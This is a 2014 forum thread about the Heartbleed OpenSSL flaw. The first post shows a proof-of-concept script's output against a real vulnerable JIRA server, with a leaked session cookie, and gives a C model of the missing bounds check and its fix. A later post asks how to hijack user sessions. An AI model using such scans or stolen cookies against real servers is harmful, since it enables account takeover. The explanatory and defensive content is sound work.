Thread subject: Security Override :: heartbleed.py exploit example

Posted by Cyber Wizard on 04/14/2014 01:26:35
#1

The Heartbleed issue is actually worse than it might immediately seem (and it seems pretty bad already).

In case you've been out of the loop, Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL that allows any remote user to dump some of the contents of the server's memory. And yes, that's really bad. The major concern is that a skilled user could craft an exploit that could dump the RSA private key that the server is using to communicate with its clients. The level of knowledge / skill required to craft this attack isn't particularly high, but likely out of reach for the average script kiddie user.

So why is Heartbleed worse than you think? It's simple: the currently-available proof-of-concept scripts allow any client, anywhere in the world, to perform a session hijacking attack on a logged-in user.

As of this morning, the most widely-shared proof-of-concept is this simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump a bit of RAM from a vulnerable server.

Let's have a look at the output of this utility against a vulnerable server running the JIRA ticket tracking system. The hex output has been removed to improve readability.

[matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3239
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@..GET /browse/
en_US-cubysj-198
8229788/6160/11/
(lots of garbage)
..............Ac
cept-Encoding: g
zip,deflate,sdch
..Accept-Languag
e: en-US,en;q=0.
8..Cookie: atlas
sian.xsrf.token=
BWEK-0C0G-BSN7-V
OZ1|3d6d84686dc0
f214d0df1779cbe9
4db6047b0ae5|lou
t; JSESSIONID=33
F4094F68826284D1
8AA6D7ED1D554E..
..E.$3Z.l8.M..e5
..6D7ED1D554E...
......*..?.e.b..
WARNING: server returned more data than it should - server is vulnerable!
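
The reason the heartbeat response above contains a cookie that had nothing to do with the request: the unpatched handler copied as many bytes as the client's payload_length field claimed, without checking that claim against the record that actually arrived. The following C model (an added example for this thread, not the heartbleed.py script and not OpenSSL's code) reproduces that missing bounds check and the one-line fix on a constructed "memory" buffer holding a constructed fake cookie, so the vulnerable and patched behaviour can be compared side by side.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Heartbeat body (RFC 6520): type(1) | payload_length(2) | payload | padding(16). */
enum { HB_REQUEST = 1, HB_RESPONSE = 2, HB_HDR = 3, HB_PADDING = 16, ARENA = 4096 };
/* Constructed "process memory": the record sits at the start; a fake session
 * cookie (constructed, not a real value) lies a little past its end. */
static uint8_t arena[ARENA];
static uint8_t resp[ARENA];
static const char secret[] = "JSESSIONID=CONSTRUCTED-EXAMPLE-VALUE";

/* Build a request whose declared payload_length ('claimed') may exceed the
 * payload bytes actually sent ('actual'). Returns the real record length. */
static size_t build_request(uint16_t claimed, size_t actual) {
    memset(arena, 0, sizeof arena);
    arena[0] = HB_REQUEST;
    arena[1] = (uint8_t)(claimed >> 8);
    arena[2] = (uint8_t)(claimed & 0xff);
    memset(arena + HB_HDR, 'A', actual);
    size_t rec_len = HB_HDR + actual + HB_PADDING;
    memcpy(arena + rec_len + 64, secret, sizeof secret);
    return rec_len;
}

/* Response builder; 'patched' enables the bounds test the fix added. */
static size_t hb_respond(size_t rec_len, uint8_t *out, size_t cap, int patched) {
    uint16_t payload = (uint16_t)((arena[1] << 8) | arena[2]);
    /* Fix: header + declared payload + padding must fit in the record that arrived. */
    if (patched && (size_t)HB_HDR + payload + HB_PADDING > rec_len) return 0;
    if ((size_t)HB_HDR + payload > cap) return 0;
    out[0] = HB_RESPONSE; out[1] = arena[1]; out[2] = arena[2];
    memcpy(out + HB_HDR, arena + HB_HDR, payload); /* unpatched: reads past rec_len */
    return HB_HDR + payload;
}

/* Does the response carry the constructed cookie that lay beyond the record? */
static int leaks_secret(const uint8_t *out, size_t n) {
    size_t m = sizeof secret - 1;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(out + i, secret, m) == 0) return 1;
    return 0;
}
int main(void) {
    size_t rec_len = build_request(1024, 16); /* claims 1024 bytes, sends 16 */
    size_t n = hb_respond(rec_len, resp, ARENA, 0);
    printf("unpatched: %zu bytes, leaks cookie: %d\n", n, leaks_secret(resp, n));
    printf("patched:   %zu bytes\n", hb_respond(rec_len, resp, ARENA, 1));
    return 0;
}
```

With the check in place, the over-long request is dropped without a response, which is also why the script's "server returned more data than it should" test stops firing on a patched host.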

Posted by PythonB on 04/14/2014 23:27:07
#2

The gist.github link doesn't work, however.

Posted by Cyber Wizard on 04/19/2014 15:14:21
#3

The script is uploaded by override! in the code section, under the name heartbleed.py.

Posted by PythonB on 04/20/2014 16:29:35
#4

Could you elaborate on how to session hijack with heartbleed?

Posted by PythonB on 04/20/2014 16:29:56
#5

Not server hijacking. I meant using Heartbleed and the information you get from it to perform a session hijack against a user somewhere in the world.